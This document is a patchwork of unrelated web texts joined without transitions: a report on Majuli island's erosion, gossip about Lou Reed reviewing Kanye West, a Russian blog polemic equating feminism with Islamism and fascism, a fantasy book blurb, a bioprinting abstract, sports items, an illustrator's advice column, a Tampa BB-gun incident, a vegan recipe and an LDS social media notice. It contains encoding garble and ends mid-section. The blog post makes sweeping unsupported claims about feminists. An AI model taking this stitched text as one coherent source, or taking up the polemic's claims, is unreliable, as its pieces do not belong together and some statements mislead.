“ We believe that if we worship the Brahmaputra and make all the prayer offerings , then the river will not disturb us , ” said one Vaishnavite priest , Ajit Sharma , as he sat cross-legged in a satra .
In recent years , government officials nominated Majuli as a candidate for World Heritage status under Unesco , though the initial application was returned because of various problems . Laya Madduri , the island 's highest ranking civil servant , said local leaders were now trying to organize preservation plans for the remaining satras and also draft a comprehensive conservation plan for the entire island .
Estimating exactly how much erosion has occurred is a matter of debate . Data collected in 1901 suggested that the island was more than 463 square miles ; but this figure may have included other surrounding islands and riverbeds . A 2004 academic study concluded that Majuli had eroded to 163 square miles in 2001 from 290 square miles in 1917 . And where the island once had 49 named streams in 1917 , the number had dropped to 7 by 1972 .
“ There are other braided rivers in the world , ” Professor Saikia said . “ But because of the earthquake , the river continues to suffer , and to fluctuate . The river is still very , very unstable . ”
Kanye West Gets MAJOR Respect For Yeezus , From Rock Legend Lou Reed !
Some people are PAH-RAISING Yeezus ! Others , well…not so much .
But Kanye West ‘ s latest album is getting two legendary thumbs up from rock icon Lou Reed !
No , seriously . This happened .
The 71-year-old sat down and wrote a 1,800-word essay on why he LOVES Yeezus ! Lou said :
“ There are moments of supreme beauty and greatness on this record . The guy really , really , really is talented . He 's really trying to raise the bar . No one 's near doing what he 's doing , it 's not even on the same planet . ”
Wow , Lou . We get it ! You like it !
There are parts of Lou 's review though that have us BEYOND confused . Like why he chose to bring up Taylor Swift :
“ Some people ask why he 's screaming on “ I Am a God. ” It 's not like a James Brown scream ├óΓé¼ΓÇ¥ it 's a real scream of terror . It makes my hair stand on end . He knows they could turn on him in two seconds . By “ they ” I mean the public , the fickle audience . He could kill Taylor Swift and it would all be over . ”
Say whaaaaa ├óΓé¼┬ª ? ? ?
What does killing TayTay have to do with anything !
Regardless of how bizarre this review might be , we think it 's pretty cool that a man who changed the face of rock and roll can appreciate a man who has no doubt left his mark on hip-hop .
Maybe it 's time for you two to collaborate ? ? ? Yeezus 2 ! ! ! DO IT ! ! !
[ Image via WENN . ]
Пишет Misha Verbitsky ( tiphareth
@ 2017-02-12 22:44:00
Настроение : sick Музыка : Jah Wobble and Marconi Union - ANOMIC Entry tags : .se , censorship , fascism , feminism , islam , porn , stukachi Social purity movement
z сообщает .
Первое феминистское правительство в мире это именно так .
https : //lj.rossia.org/users/z/118776.ht ml
Речь идет о делегации феминистического правительства
Швеции в Иране ( преимущественно женской ) , одетой в хиджабы ,
в соответствии с иранскими законами .
Не вижу тут никакого противоречия с феминизмом :
феминистки , вообще-то , в большинстве своем поддерживают
ношение хиджаба и в целом исламские обычаи в отношении
женщин тоже поддерживают . Глупо думать , что `` феминизм ''
имеет какое-то отношение к `` освобождению женщин '' , может ,
когда-то и имел , но сейчас это просто одна из форм
агрессивного пуританизма . То есть мракобесная и
авторитарная реакция на травму , причиненную модерном ,
урбанизацией , пост-индустриальной революцией и
торжеством фаллогоцентризма .
По сути , `` муслимские братья '' или какие-нибудь
`` православные хоругвеносцы за путина '' заняты тем
же самым , что и феминистки . И исламизм , и феминизм ,
и фашизм , и русский фашизм - формы реакции на одно
и то же травматическое воздействие . Неудивительно ,
что они так похожи , вплоть до неразличимости ;
и неудивительно , что в европейской политике
феминистки все без исключения занимают происламские
позиции , вплоть до борьбы за жесткую цензуру
Интернета , хиджаб и женское обрезание ( хотя
последнее , кажется , пока отчасти экзотика ) .
Феминизм есть ультраправое , мракобесное
движение , форма пуританизма .
Это даже и не новация : в конце 19- начале 20
века феминистки занимались в основном борьбой за
закрытие баров и борделей , потому что бары и бордели
оскорбляли их чувство приличия , и добивались помещения
проституток в работные дома ( `` reform homes '' ) либо дурдом
пожизненно , потому что эти женщины безнадежно испорчены и
угрожают ценностям семьи и государства . Вершиной этого
движения был закон о запрете алкоголя , принятый в
1918-м году под давлением феминисток .
В 1920-е это движение ( `` Social purity movement '' )
несколько утихло , а когда феминистки заявили о
себе в 1960-х , ассоциация с традиционным феминизмом
( то есть борьбой с развратом и проституцией за семейные ценности )
отчасти забылась . Но отход феминизма от базовых феминистических
ценностей ( борьбы с развратом и за семейные ценности ) оказался
временным явлением потому что феминизм 2010-х от феминизма 1910-х
не отличается только набором союзников : в 1910-х это
были протестантские проповедники и полиция , а в 2010-х
это исламские проповедники и полиция . Особенно
это заметно в Швеции , где основным ( по сути , единственным )
достижением `` феминизма '' были законы против проституции и
разврата : `` Social purity movement '' , версия 2.0 .
Вот полезные ссылки про `` temperance movement '' ,
`` social purity movement '' и традиционный феминизм .
https : //en.wikipedia.org/wiki/Woman % 27s _Christian_Temperance_Union
https : //en.wikipedia.org/wiki/Social_pu rity_movement
http : //www.catholiceducation.org/en/con troversy/feminism/the-changing-faces-of-f eminism.html
Some equate feminism with a virulent leftist political
philosophy that advocates abortion , lesbianism ,
pornography , witchcraft , and goddess worship . In fact ,
however , this `` neofeminism '' is far removed from the ideals
and goals of the 19th-century feminists , who were strongly
rooted in the Judeo-Christian concepts of morality and
justice .
For most early feminists , Christian idealism was the
motivating force behind their demands for the reform of
attitudes and laws that allowed the suppression of the
weak .
They condemned male promiscuity , and denounced the social
injustices that induced their sisters to degrade
themselves in lives of prostitution . They demanded that
husbands honor their commitments to their wives , and that
sons learn to honor the integrity of all women . Equal
rights , they believed , could be achieved only by fidelity ,
mutual sacrifice and commitment . Self-control , not
self-indulgence , was their solution to marital
unhappiness .
Тhey condemned artificial contraception as `` unnatural ,
injurious , and offensive '' to women . They believed that
contraceptives in the home would further entrench women in
the role of sexual objects for their mates . Contraceptives
would deny women their rightful fertility , turning wives
into little more than prostitutes , always `` safe '' for
husbands to exploit to satisfy their
passions . Contraceptives would also free men from the fear
of an untimely pregnancy and so remove the one emotion to
which women could appeal when faced with unwanted sexual
advances .
Widespread contraceptive use , feminists argued , would
encourage promiscuity , undermine chastity , lure their
husbands and sons into illicit sexual exploits , and
expose more women to seduction , abuse and abandonment .
Feminists also condemned abortion . They insisted it was
immoral to kill an unborn child . Susan B. Anthony ,
Victoria Woodhill , and virtually every other noted
feminist leader of the last century described abortion as
`` infanticide '' and `` child- murder . ''
http : //www.tandfonline.com/doi/pdf/10.1 080/09612029200200013
The social purity movement of the 1880s
was part of this new interventionist approach . All this may give us a small
part of the explanation for the interventionist activities of certain
middle-class social purity feminists . However , these women were not simply
acting as members of the middle class , but also , and crucially , as religious
feminists with a history of philanthropy . Thus for a greater understanding of
their actions , it is important to look at what informed their vision of purified
meanspublic and private worlds , and what appeared appropriate to further
the desired end . The vision of social purity feminists was partly shaped by
certain religious beliefs , and frequently by adherence to temperance , in
which women were seen as the victims of male alcoholic abuse . That some of
these feminists actions took a repressive and statist form needs to be
related in part to their heritage of philanthropy , their views concerning
female sexuality , and their changing attitude towards local government and
the state . But first , what exactly was this repressive activity in which a
number of feminists were now engaged ?
... Over the following two years the NVAs The Vigilance
Record , edited by Mrs Ormiston Chant , was full of the good work being
done by vigilance groups in closing brothels . Yet the NVA faced a recurrent
problem : prostitutes lack of inclination to leave their sinful life . Attempts
at rescue work seem to have been decidedly unsuccessful so far as the
inhabitants of closed-down brothels were concerned . The outcome of the
NVAs closing of a colony of brothels in Aldershot in 1888 was a case in
point . Asked what would happen to the 400 girls and children rendered
homeless by their action , William Coote , the NVAs secretary , replied in an
open court that he was prepared to take charge of the whole of the girls
and children ... provided they were anxious to make an effort to lead an
honourable and honest life . Only one girl took up the offer . Of those
prostitutes unwilling to be saved , 90 marched through Aldershot in protest ,
four abreast , singing as they went .
In a pamphlet written in the 1880s , feminist NVA member Dr Elizabeth
Blackwell differentiated between three methods of dealing with prostitution .
Firstly , she referred to the let alone system , ( laissez-faire ) . In operation in
London , it encouraged the streets to be a public exchange of debauchery
for vicious men and women , [ with ] brothels allowed to flourish and
multiply . Secondly , she presented the female regulation system the
system favoured on the Continent and in operation in the UK under the
Contagious Diseases Acts . She was adamantly opposed to this method too
because it fostered corruption and ... moral degradation . The third system
the only righteous method of dealing with vice by means of law was
the repressive system .
Привет
Runemaster
Series : The Shardheld Saga , Book 2
Note : This is book 2 of a trilogy The second volume in The Shardheld Saga continues the epic story of Muus , the Shardheld , of Kjelle , who lost his domain to rebels , of Birthe , the tough young wisewoman with her baby , and of Tuuri , false Rannar 's messenger . Shipwrecked and divided , how will they succeed in their endeavors ? Journey with them through the dangerous world of 'Runemaster ' and find out.Note : This is book 2 of a trilogy More
Muus , Kjelle and Tuuri ; three young men , separated by allegiance but intertwined by Fate . Birthe and Moirra ; two young women with their own goals .
Muus found the mysterious blue stone that crashed down near his home . Now he is both a Runemaster , learning the terrible power of the runes , and the Shardheld , on whose shoulders rest the fate of the world 's magic . He is desperately trying to resist the pull of the skyshard before it takes over his mind . Step by step , Fate brings him nearer to Falrom , the Burning Land , and the standing stone that waits for the skyshard .
Kjelle is the dispossessed Lord , whose disgruntled men are the Norden 's line of defense against hordes of Fynni barbarians plundering the lands . He has to stop the Fynni from reaching their goal , the return of the Old Gods and with them , all the horrors from the distant past .
Tuuri , follower of the powerful warlord bent on conquering the north . Troubled by doubts , hatred of his Fynni heritage , hunted by both sides of the conflict , he hurries south to a choice he does n't yet know he has to make .
Birthe , widow and mother at sixteen , both Völva - mistress of the magic of the Nords - and huntmaster , accompanies Kjelle in the hope of finding a new purpose now everyone she loved , is dead .
Moirra , the Un-a-Dach druidess , small , doughty and wise , joins Muus on his journey to Falrom , the Burning Land . But she has secrets in her past , and a purpose she does n't speak of .
And there are others , like the far too clever boy Hraab , the young Prince Ottil , the fearsome bear berserker Ajkell and the Lady Paladin Valiantrude . Join them on their journeys through danger in the lands of Brytanna , Gaul and Lotharn , for theirs is high adventure in a world filled with rebels , Vikings and idolaters of false Gods .
Follow their gripping story in Runemaster , the second book of The Shardheld Saga .
Note : This is book 2 of a trilogy ( Shardfall , Runemaster , Shardheld ) .
3D printing of biological tissues has been of increasing interest to the biomaterials community in part because of its potential to produce spatially heterogeneous constructs . Such technology is particularly promising for orthopedic applications , which require the generation of complex geometries to match patient anatomy and complex microstructures to produce spatial heterogeneity and anisotropy . Prior research has demonstrated the capacity to create precisely shaped 3D printed constructs using biocompatible alginate hydrogels . However , alginate is extremely compliant and brittle , and high-density collagen hydrogels could be a preferable option for load-bearing applications . This research focused on developing and evaluating a method of printing soft tissue implants with high-density collagen hydrogels using a commercially available 3D printer , modified for tissue-engineering purposes . The tissue constructs , seeded with primary meniscal fibrochondrocytes , were evaluated using measures of geometric fidelity , cell viability , mechanical properties , and fiber microstructure . The constructs were found to be mechanically stable and were able to support and maintain cell growth . Furthermore , heterogeneous 3D-printed constructs were generated , consisting of discrete domains with distinct mechanical properties .
Why The Red Sox Are So Likely To Win The AL East Hot Takedown discusses the NFL 's Week 1 , MLB 's movers and shakers , and upsets at the U.S. Open
Welcome to the latest episode of Hot Takedown , FiveThirtyEight 's sports podcast . On this week 's show ( Sept. 13 , 2016 ) we talk to ESPN 's Bill Barnwell about the NFL 's opening weekend and ask him if Tom Brady is great because he has Bill Belichick as a coach . Then , it 's almost playoff time in Major League Baseball , so we take a look at some of the teams in contention as we head toward October . Finally , there were upsets in both the men 's and women 's tournament at this year 's U.S. Open . We welcome back FiveThirtyEight 's Carl Bialik , who tells us why the upsets ran counter to FiveThirtyEight 's forecast . Plus , a significant digit on Tim Tebow 's move to the New York Mets .
Links to what we discuss :
My friends , colleagues and I have recently noticed that communication with illustrators is falling apart . We lament this new trend often . While there are still many art directors in the field who efficiently and effectively communicate with their artists , there are seemingly just as many who are entering the profession without having been instructed in how to properly assign work or manage projects . I do not blame these individuals – not one bit . I blame the educators who failed to send them out into the world with good communication skills . Or perhaps I blame the lack of on-the-job training at publications , where art directors are hired and fired at increasingly rapid rates . Whatever the reason , the problem persists .
Therefore , here is a guideline that will lead to improved communication , fewer revisions , better artwork , and fewer headaches for all involved .
1 . Your first email to an illustrator should not read : “ Hey , are you available for an assignment ? ”
This kind of email is a waste of everybody 's time , because all of the important information is missing : size and number of illustrations , context , timeline , and budget . In order to reduce the back-and-forth between the individual assigning the art , and the illustrator , simply take a moment to include the important information in the initial email request . For example : “ Hello , John – we are publishing a story about the ongoing conflict between hedgehogs and walruses . We will need a cover , a full page , and two spot illustrations . The deadline for sketches is March 1st , and the finals will be due March 8th . Our budget is $ 3750 . Are you available / interested in working with us on this assignment ? Please let me know by 5pm today . Thank you . ”
With one email , you have now given the artist all of the info needed for him/her to decide whether or not to accept the job . This used to be the standard introductory email for all assignments . I 'm not sure what happened , but I , and many illustrators I know , rarely get emails like this any more . Let 's fix that .
2 . Please do not expect illustrators to read minds .
Details are very important . When sending emails about your job , give as many relevant details as possible to an artist , if the assigned artwork has specific requirements . Illustrators are very capable of drawing anything you need , but we can not guess what that might be if we are not told up front . For example , if you tell an illustrator to draw “ a car on a street , ” then the illustrator will assume the make and model of the car are not important . S/he will also assume the street can be any kind of street . Therefore , it is not fair to the artist to reject the final art because you expected a vintage Porsche on the Autobahn . Please be sure to communicate all required elements of the art in your earliest correspondence with your artist , and it will be smooth sailing for all .
Sometimes , very little direction is preferred , if the assignment calls for a lot of artistic freedom and interpretation . But , let us not confuse this with a lack of relevant information . For instance , the recent recipient of the Richard Gangel Art Director Award , SooJin Buzelli , is famous for giving her artists a lot of freedom . But let us note that when she assigns work , she actually has spent a good deal of time figuring out a way to distill a complex article down to its essential message or theme . She then sends this one or two sentence summary to a carefully selected illustrator , providing that individual with a perfect launchpad from which to create a unique visual solution . Concise and efficient .
3 . Please write back . Please .
This is just common courtesy . I often get asked if I am available for an illustration and I then respond in the affirmative with some questions about the assignment or the budget or some other detail . Then , no reply ever comes . A week later , I will see another artist blog about completing the very same assignment that was initially emailed to me . While I understand that everybody is very busy , and emails are flying around at the speed of light , I urge you to please remember that it is unprofessional and quite rude to simply leave an artist hanging . We often will put other things on hold or rework our weekly schedule to accommodate a project that we think is moving forward . A simple email to let us know that you will be working with somebody else , the job is cancelled , the issue is on hold , etc . is all we need to move on and stay on top of our other jobs . Thank you .
– Kyle T. Webster
Group features a member of Jane 's Addiction
The Strokes bassist Nikolai Fraiture has shared new single ‘ With You Tonight ' from his band Summer Moon .
Earlier this year , Fraiture unveiled a demo of the track featuring Au Revoir Simone 's Erika Spring , The Like 's Tennessee Thomas and guitarist Lewis Lazar . This re-recording features a new-look line-up of Jane 's Addiction 's Stephen Perkins on drums , Uh Huh Hers Camila Grey as vocalist/keyboardist and the Airborne Toxic Event 's Noah Harmon on guitar .
As well as playing bass in The Strokes , Fraiture released solo album ‘ The Time Of The Assassins ' under the name Nickel Eye in 2009 .
Listen to the single version of ‘ With You Tonight ' below .
Speaking in a recent interview with Noisey , Fraiture discussed the origins of Summer Moon 's music and why he decided to team up with his friends in order to make music .
Sharethrough ( Mobile )
“ I had some songs that were going to be the second solo album for Nickel Eye , but then I kind of got lonely and decided to play with some other people , ” he said .
“ The most important thing to do for me was to do something different and not the typical band setting , ” he added . “ Even having two girls and two guys , it 's an interesting dynamic . We have good chemistry , which I believe is super important , you know , almost 70 per cent of the band 's identity falls on that . It 's eclectic , diverse , and really fun . ”
Fraiture also revealed that Summer Moon will record an album in the near future . “ We 're working towards releasing a full-length album and eventually touring it and continuing the momentum that 's been built up until now . The chemistry within the band is something we all enjoy , we 're looking forward to whatever comes beyond . ”
Summer Moon made their live debut in December 2014 .
https : //link.brightcove.com/services/player/ ? bctid=1227861206001
Buffalo 's Khalil Mack ( left ) earned an honorable mention on SI 's 2012 All-America team . ( Bill Wippert/AP ) Buffalo 's Khalil Mack ( left ) earned an honorable mention on SI 's 2012 All-America team . ( Bill Wippert/AP )
Though the NFL draft is still months away , the college football season looms just around the corner . So , with that in mind , Audibles is taking a look at one intriguing draft prospect from each FBS team .
Thanks to Eric Fisher landing at No . 1 overall in the 2013 NFL draft , casual football fans are starting to learn what the insider community has known for years : The MAC is legit . Over the years , the conference has produced such talent as Ben Roethlisberger , Greg Jennings , T.J. Lang , Josh Cribbs , Julian Edelman and others . Victor Cruz , Bernard Pierce and Rod Streater , to name a few , also honed their games at schools that moved into the MAC after they left .
The MAC could storm the 2014 draft , too . The country was introduced to Northern Illinois quarterback Jordan Lynch during his team 's BCS run last season ... and he may wind up the second-best QB in the league , behind Ohio 's Tyler Tettleton . Add in other legit skill-position talent , such as Toledo 's Bernard Reedy , Kent State 's Dri Archer and Buffalo 's Branden Oliver , and scouts should have plenty to chew on .
Oh , and there is a ton of talent on the other side of the ball , including at least one potential first-rounder , OLB Khalil Mack ( we 'll get to him ) .
This conference is as good a place as any to kick off our 2014 draft preview . And , with that , a look at one player per MAC team with a shot to hear his name called next May :
Akron : Moses McCray , DT .
The Zips have gone 3-33 over the past three seasons , so it makes sense that one of their top players would have come to them from another program . McCray comes to Akron from Florida State , where his career was derailed repeatedly by injuries -- he redshirted in 2010 , missed several games in 2011 , then earned a medical redshirt after missing 2012 .
He 's a big body at 6-foot-2 , 318 pounds , capable of playing either 1-technique or 3-technique inside . McCray also moves better than you 'd expect for a player of his size . If he could get through the 2013 season intact , McCray could provide some serious punch up front and be of interest to NFL teams looking for some extra beef along their defensive line .
Bowling Green : Jerry Gates , S .
As we saw in the 2013 draft with players like Jonathan Cyprien and D.J . Swearinger , NFL defenses are searching far and wide for multi-dimensional safeties who can cover and play in the box . Gates ( aka `` BooBoo '' ) fits the bill . The 5-11 , 213-pound senior racked up 73 tackles in 2011 as the team 's `` Rover '' -- a hybrid safety/linebacker position -- and he 's on the watch list for the Paul Hornung award , handed out to college football 's most versatile athlete , this year as a safety .
In addition to playing all over the field on defense , Gates also racked up an impressive 981 kick-return yards in 2011 and has more than 1,700 total return yards in his career .
Buffalo : Khalil Mack , OLB .
Is Mack the most draftable prospect in this conference ? He certainly has a strong case , coming off an honorable mention on SI 's 2012 All-America Team . Mack , 6-3 , 245 , needs 19 tackles-for-loss in his senior season to set an NCAA record ( he had 21 in 2012 and 20.5 in '11 ) . He probably could have turned pro after his junior year and earned a Day Two selection . Another big year may push him into the first round .
Playing outside linebacker in the Bulls ' 3-4 scheme , Mack has proven himself to be capable of getting to the QB ( 18 career sacks ) or dropping into coverage . He could log heavy minutes as an NFL rookie in 2014 , if he lands in the right system .
Kent State : Roosevelt Nix , DT .
The good folks over at Draft Breakdown have a couple of Nix 's game films up , and he 's well worth a watch . Even against Alabama in 2011 , Nix 's presence on the field is noticeable .
A three-time All-MAC performer , Nix is a bit of a curious draft case because of his size -- currently listed at 5-11 , 260 , though he 's played in the 240s . That 's mostly unusual because Kent State uses Nix as a defensive tackle . He is light for that position in the NFL , so teams will have to figure out if they can bulk him up or if he needs to move to a DE spot . With 52 career tackles for loss and 20.5 sacks , Nix has shown time and again that he 's capable of wreaking havoc up front .
Tight end Rob Blanchflower caught 43 passes for the Minutemen last season . ( Frederick Breedon/Getty Images ) Tight end Rob Blanchflower caught 43 passes for the Minutemen last season . ( Frederick Breedon/Getty Images )
Massachusetts : Rob Blanchflower , TE .
The Minutemen are in just their second FBS season , so there 's a clear dearth of talent here . The lone player from this program selected in the 2013 draft , RB Michael Cox , came off the board one pick before Mr . Irrelevant . And UMass may be shut out in the 2014 draft . The 6-4 , 250-pound Blanchflower looks like the best hope . He caught 43 passes last season and can be an impact blocker , too .
Miami ( Ohio ) : Josh Harvey , OT .
An absolute monster at 6-5 , 355 , Harvey started all 14 Redhawks games during his redshirt freshman season in 2010 and was in the starting lineup 11 times ( three times at RT , eight times at LT ) last season . His size alone should garner attention come draft time , especially if Harvey earns a Combine invite and impresses in strength drills .
The big issue here ? He 's currently penciled in as a backup . Miami will use Zach Lewis at right tackle ( to blindside for intriguing southpaw QB Austin Boucher ) and has Jeff Tanner ticketed for the left side .
Ohio : Travis Carrie , CB .
The folks in Athens are really excited to have Carrie back after he missed the 2012 season with a shoulder injury . That was an unfortunate setback , off an impressive 2011 in which Carrie picked off four passes , broke up 13 more and averaged 14.1 yards as a punt returner . Obviously , Carrie 's athleticism is what puts him in the NFL draft conversation . Speed plus size is a terrific combination to have at cornerback , and Carrie really could rocket up draft boards if he returns as a lock-down defender again .
Ball State : Nathan Ollie , DT .
Ollie 's teammate on the defensive line , Ohio State transfer Jonathan Newsome , probably will garner more attention heading into 2014 . Ball State coach Pete Lembo spoke highly of the consistent Ollie , though , praising his locker-room presence ( Ollie is a team captain ) and describing him as a `` low-maintenance '' guy .
Lembo also admitted that Ollie needs to get stronger during his senior season and beyond . He 's playing a DT role for the Cardinals at 6-1 and somewhere between 285 and 295 pounds , but he may not be bulky enough for a 1-technique spot in the pros or quick enough to kick out as a 3-4 DE . So , Ollie 's No . 1 goal over the next eight months will be to pack on some pounds so he can be an anchor .
Zurlon Tipton has shown nice vision out of the backfield for Central Michigan . ( Carlos Osorio/AP ) Zurlon Tipton has shown nice vision out of the backfield for Central Michigan . ( Carlos Osorio/AP )
Central Michigan : Zurlon Tipton , RB .
Tipton benefited from running behind 2012 No . 1 overall pick Eric Fisher en route to a 1,500-yard season . He has the game to stay successful in 2013 sans Fisher 's help . Tipton brings solid size to the table at 6-1 and around 220 pounds , but he still has the speed to turn the corner and pull away in the secondary . He also has shown nice vision out of the Central Michigan backfield , excelling as a one-cut runner .
While he may not be high on NFL radars yet , Tipton has all the attributes of a Day 3 pick who then surprises with his production as a rookie .
Eastern Michigan : Donald Coleman , S .
Another team that is a bit behind the 8-ball from a talent perspective , Eastern Michigan could start upwards of 15 non-seniors in 2013 . The Eagles will need Coleman , in his second season here after transferring from North Carolina State , to be a leader in the secondary . The 6-0 , 200-pound Coleman made 87 tackles last season and is capable of playing either strong or free safety .
Northern Illinois : Jimmie Ward , S .
Yep , another safety on the list . Ward could wind up being one of the top three or four strong safeties drafted , because he simply knows how to find the football . That 's true both on defense , where the 5-11 , 192-pound Ward has averaged 102 tackles over the past two seasons ; and on special teams , where Ward has developed into one of the nation 's best punt blockers .
The Huskies have used him all over the secondary , including at cornerback out wide and lined up over opposing tight ends . His coverage skills still need a lot of work , but Ward does not hesitate to take on blockers . Ward may have the highest upside of any player in the conference -- he 's been very good in his Northern Illinois career , but it still seems like there 's more untapped potential underneath the surface .
Toledo : Zac Kerin , C .
The Rockets ' offense could be thrilling to watch , with mobile QB Terrance Owens and 2014 prospects David Fluellen and Bernard Reedy teaming up . Kerin , a 6-5 , 300-pound Rimington Award candidate helps run the show from the center position . Toledo offensive coordinator Jason Candle and associate head coach Louis Ayeni both raved about Kerin 's impact on their team 's offense .
Kerin can mash up front , but Toledo also uses him as a pulling blocker frequently . Even with his NFL-ready size , Kerin can get outside the tackles and pave the way . Candle also noted Kerin 's long arms , an attribute that NFL scouts will love and which could come in handy if a future move to guard is in order .
Western Michigan : Johnnie Simon , OLB .
Even though he plays at just shy of 200 pounds , Simon will see the bulk of his action at linebacker this season for the Broncos . He 's more of a safety prospect for the NFL , and that 's where he has played a great deal in the past for Western . Linebackers coach Tim McGarigle told SI that the Broncos do not really lock Simon into one specific position anymore , because he can match up with just about any personnel grouping thrown onto the field by opposing offenses .
TAMPA — Tony and Amy Abdallah had two problems with the UberEats driver who came to pick up an order at their Seminole Heights pizza place on Sunday .
For one , the man did n't have the proper bags to ensure their customer 's pizza arrived hot . But there was something even more troublesome , said the owners of Crusty 's Pizza on N Florida Avenue .
`` He was visibly under the influence of something , '' Amy said . `` I do n't know what it was , but he was n't sober . ''
Moments later , after Tony told the man they would be calling Uber for another driver , the man became enraged , pulled out a BB gun and shot at the building . The BBs narrowly missing the couple 's 18-year-old daughter doing prep work in the kitchen .
Police said the man shot at least five rounds into the building before fleeing south on Florida Avenue . Tampa police were still searching for him Wednesday , police spokesman Eddy Durkin said . Few other details were released , including the driver 's name .
Amy Abdallah said she and her husband were unhappy about the heating bags , but were more concerned about having an intoxicated man delivering their food .
`` Anyone who delivers our food is basically a face for our business , '' she said .
The man cursed as he shouted that the bag `` was n't my problem , '' making a scene in front of customers , Amy said . Tony asked him to leave and the man got angrier . He spit at Tony and started kicking the building and shrubbery .
A moment later , he shot three BBs through a kitchen window . The projectiles , Amy said , came within six inches of her daughter 's head .
The driver got into his car and drove away , then returned and shot two more times into Crusty 's front window and the window of the adjoining Chop Chop Shop , a Korean fusion restaurant , before fleeing again , according to police .
The BBs completely shattered the Chop Chop Shop 's window , Amy said . Tinted film on Crusty 's front window kept the glass intact .
The shooting happened just moments after the Abdallahs ' other daughters , ages 11 and 12 , walked inside the restaurant carrying items from Amy 's car , she said .
`` All three of my children are extremely traumatized , '' she said . `` They ask , 'Did the police catch the bad guy ? Are we going to have to go back to the restaurant ? ' ''
Police said the man might have been driving a GMC sport utility vehicle . Amy Abdallah said the Uber app said he should have been driving a GMC Envoy but that neighbors reported seeing him in a Volkswagen . Residents even snapped photos , she said .
A spokeswoman for Uber , Jodi Kawada Page , said the company has blocked the driver 's access to the Uber app while the investigation is pending . The company cooperates with criminal investigations when contacted by law enforcement agencies and is doing so in this case , Page said .
Amy Abdallah said Uber reps told her the driver had passed the company 's background check . Page confirmed that .
Abdallah said the incident has not let the incident sour the couple on Uber . The drivers have always been polite and courteous , she said .
Nor has the shooting dimmed the couple 's view of their new neighborhood . In fact , it 's done the opposite . They believe more than ever that moving from Virginia to Seminole Heights to open their business was the right decision .
`` The Seminole Heights community has been so welcoming and compassionate , '' Amy said . `` The real heroes are the people who have gone above and beyond in being helpful and looking out for us at Crusty 's . ''
Contact Tony Marrero at [ email protected ] or ( 813 ) 226-3374 . Follow @ tmarrerotimes .
This week there are bake sales happening all around the world as part of the Worldwide Vegan Bake Sale . My local vegan group did n't have as many people baking as last year and it got me thinking about a stress-free way to make lots of delicious things .
It 's helpful to figure out what keeps for the longest , what can be made at the last minute , what is best made the day beforehand and work out a rough schedule from there .
•Cakes , muffins and cupcakes are best made the day before the sale , it gives them time to cool down , but not so much time that they will lose freshness .
•Many biscuits can be made a few days in advance . The best candidates for these are ones that use plenty of oil and a minimum of water . The Vanilla and Almond Crescents that I created for a baking book ( to hopefully be published in 2013 or 2014 ) are great for this , the recipe is in this post .
•Raw truffles will keep for a while in the fridge , and can also be a good thing to make at the last minute as I did the morning of the bake sale by making a half batch of raw brownies from My New Roots and rolling them in cacao to serve as truffles .
•Dry ingredients can be mixed together hours , days or weeks before baking . This is especially helpful if you 're baking a lot of cakes in one day .
More observations from vegan bake sales :
•There can never be enough chocolate . I found this out at my first stall that with a selection including some of Gunter 's delicious recipes , the chocolate caramel and almond torte pictured above ( from Triumph of the Lentil ) , plain chocolate cake , carrot cake and date cake that the most popular cakes were the ones with chocolate .
•Vegan-friendly cafés and businesses are often happy to donate cakes or ingredients .
•Having ingredients lists on hand for everything is a good idea for people with allergies , and is asked for here when council permits are required .
•Covers for the food are often expected by the council as a condition of the permit . Transparent ones are the best and plastic wrap can serve this purpose if there is nothing else around .
•It 's easy enough to get a bake sale organised , even with a minimum of people . It 's a good fundraiser and an excellent way to expose people to vegan food . Not all places require council permits , and if they are difficult to deal with then it 's easy to get around that by giving food away for free with a donation box at the stall .
And for the vanilla and almond crescent recipe…
These are an incredibly delicious biscuit with just the right amount of sweetness and lots of rich flavours from the almonds and vanilla . My choice of coconut oil for this ( and most of my cooking ) is the more refined kind , which is refined by filtering it through clay to remove the coconut taste and smell , this gives a ‘ buttery ' flavour and texture to the baked good with all the goodness of coconut oil , but without being overwhelmed by coconut flavours .
Soy-Free , Wheat-Free , Gluten-Free Option , under 45 minutes
Kitchen time 15 minutes , baking time 12-15 minutes
Ingredients :
1 cup almonds , ground
3/4 cup unrefined sugar
2 1/3 cups barley flour ( or wholemeal spelt , wholewheat pastry or gluten free )
a pinch of salt
3/4 cup coconut oil , melted ( or a mixture of melted coconut oil and olive oil )
1/4 cup water
2-3 teaspoons vanilla extract
optional powdered vegan sugar , for coating
Method :
Preheat the oven to 175c ( 350f ) . Line or grease two baking sheets .
For best results , grind the almonds and sugar together in a food processor . In a mixing bowl , combine the almonds , sugar , flour and salt . Stir through the coconut oil , water and vanilla extract to form a thick dough .
Take tablespoons of the dough and shape into logs that have thinner ends and a thicker centre . Curl into crescent moon shapes and place on the baking trays .
Bake for 12-15 minutes , until lightly browned . Sprinkle with powdered vegan sugar if you want .
I suspect these will keep in a sealed container for longer than a week , although they never last that long in our house .
* * * * *
On a side note , I 've created a special Facebook page for this blog . Click ‘ like ' on this page if you 'd like to be updated on new blog posts , recipes and more .
Advertisements
Like , Tweet , and Share Live General Conference Updates
“ Let 's make sharing our faith online more a part of our daily life . LDS.org , Mormon.org , Facebook , Twitter—all provide opportunities. ” —Neil L. Anderson of the Quorum of the Twelve
This weekend it will be easier than ever for you to like , tweet , and share your favorite general conference quotes and insights .
Thousands of members flock to social media during general conference to share their testimonies , favorite talks , announcements , and quotes . Now the Church is facilitating the sharing of those messages by making quotes and announcements available in real time .
If you follow the Church 's official Facebook page , Twitter , and Google+ accounts , you 'll receive live general conference updates , quotes , memes , and video highlights to like and share with your friends .
During the most recent Relief Société Générale meeting on Saturday , Sept. 28 , live updates were shared from the Church 's Twitter and Facebook accounts . At one point during the broadcast , the hashtag # ReliefSociety became one of the top 10 trended terms on Twitter in the United States . In previous years , the hashtag # ldsconf , which is commonly used when referring to general conference , has also been one of the highest trending Twitter topics , with as many as 128,000 tweets shared with that hashtag during the April 2013 general conference .
Elder Neil L. Andersen of the Quorum of the Twelve Apostles has encouraged members of the Church to share the gospel through the Internet . “ Let 's make sharing our faith online more a part of our daily life , ” he said . “ LDS.org , Mormon.org , Facebook , Twitter—all provide opportunities ” ( “ It 's a Miracle , ” Apr . 2013 general conference ) .
Messages shared through social media are often the start of inspiring and meaningful online conversations . “ I have been blessed by reading so many thoughts from other people , ” said Ryan Bickmore of Salt Lake City . “ I learn a lot from discussions on those thought-provoking posts . ”
For members who might consider social media too new and unfamiliar to be useful , the following social media terms and frequently asked questions may be helpful :
How can I find and follow the Church 's official social media accounts ?
